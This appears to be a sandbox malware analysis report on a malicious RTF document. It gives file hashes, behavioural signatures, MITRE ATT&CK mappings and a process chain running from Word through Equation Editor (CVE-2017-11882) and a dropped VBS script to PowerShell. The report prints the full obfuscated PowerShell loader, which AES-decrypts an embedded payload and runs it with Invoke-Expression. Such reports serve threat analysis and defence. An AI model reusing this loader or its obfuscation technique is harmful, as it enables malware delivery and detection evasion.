112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3

General

Target

f7c34c11bb5d9cdcece78edae0beff42.rtf
Size

94KB
MD5

f7c34c11bb5d9cdcece78edae0beff42
SHA1

96f2510fbb5c6203e21ead4dd55daaab59a86f4e
SHA256

112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3
SHA512

9b733c0d88c98adfe48e45079276ff7e059540445aa576b9eb637ac5c6881586336740384d71ab8a98e24b6f13c76d2ad88dd4437077dabd6a8d7829cd037164
SSDEEP

768:GS6MQ5k2WKcczrYFUoNVEbHfwFclPY49Ug+:tSWKccXYtclPYaA

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

EQNEDT32.EXEpowershell.exe

flow pid process

3 2368 EQNEDT32.EXE
5 2112 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2112 powershell.exe

flow	pid	process
3	2368	EQNEDT32.EXE
5	2112	powershell.exe

pid	process
2112	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WINWORD.EXEEQNEDT32.EXEWScript.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2368 EQNEDT32.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2152 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2112 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2112 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2152 WINWORD.EXE
2152 WINWORD.EXE

pid	process
2368	EQNEDT32.EXE

pid	process
2152	WINWORD.EXE

pid	process
2112	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2112	powershell.exe

pid	process
2152	WINWORD.EXE
2152	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

EQNEDT32.EXEWScript.exeWINWORD.EXE

description	pid	process	target process
PID 2368 wrote to memory of 2784	2368	EQNEDT32.EXE	WScript.exe
PID 2368 wrote to memory of 2784	2368	EQNEDT32.EXE	WScript.exe
PID 2368 wrote to memory of 2784	2368	EQNEDT32.EXE	WScript.exe
PID 2368 wrote to memory of 2784	2368	EQNEDT32.EXE	WScript.exe
PID 2784 wrote to memory of 2112	2784	WScript.exe	powershell.exe
PID 2784 wrote to memory of 2112	2784	WScript.exe	powershell.exe
PID 2784 wrote to memory of 2112	2784	WScript.exe	powershell.exe
PID 2784 wrote to memory of 2112	2784	WScript.exe	powershell.exe
PID 2152 wrote to memory of 976	2152	WINWORD.EXE	splwow64.exe
PID 2152 wrote to memory of 976	2152	WINWORD.EXE	splwow64.exe
PID 2152 wrote to memory of 976	2152	WINWORD.EXE	splwow64.exe
PID 2152 wrote to memory of 976	2152	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f7c34c11bb5d9cdcece78edae0beff42.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2152

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:976

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemsitsgreattoreleasethedargon.vBS"
2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
883a161bbdf8c2dd10269f9b3e79d834

SHA1
83674048ad3fc9a751031fa64992a8eae0053873

SHA256
e11337f4eac56272c13e4cb3e0a658c151a187e67351ba4449eb1326bcee57ab

SHA512
e6d7bea67c26f1d7015b44b251248bb6963641b117a523b8cdbf83c88f171a9098640570c0e79dff95868e9cff11ae989beb4e5c32dd2b905098ae070c6648e6

Download Submit
C:\Users\Admin\AppData\Roaming\seemsitsgreattoreleasethedargon.vBS

Filesize
403KB

MD5
1e06a0b540d76abb6e2712fa7e37138a

SHA1
1e7a793fe2bcd27f2757969043cdf5f5231e977e

SHA256
7d9be9418bca7c307c7fed9ab4ad56058363ee8ad59ae401cfdbcbea7ff252e9

SHA512
2b7cde726ee68b9d1cfa24c4413ebf5ab9f026b758d7cc4b6d9c6ad4eaf4b626abdde06e55d529ff2092e06f16dc8f86df935db118727733b1cd6c7284a5184a

Download Submit
memory/2112-18-0x00000000053F0000-0x000000000543F000-memory.dmp

Filesize
316KB

Download
memory/2152-0-0x000000002FB51000-0x000000002FB52000-memory.dmp

Filesize
4KB

Download
memory/2152-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2152-2-0x00000000714BD000-0x00000000714C8000-memory.dmp

Filesize
44KB

Download
memory/2152-19-0x00000000714BD000-0x00000000714C8000-memory.dmp

Filesize
44KB

Download
memory/2152-38-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads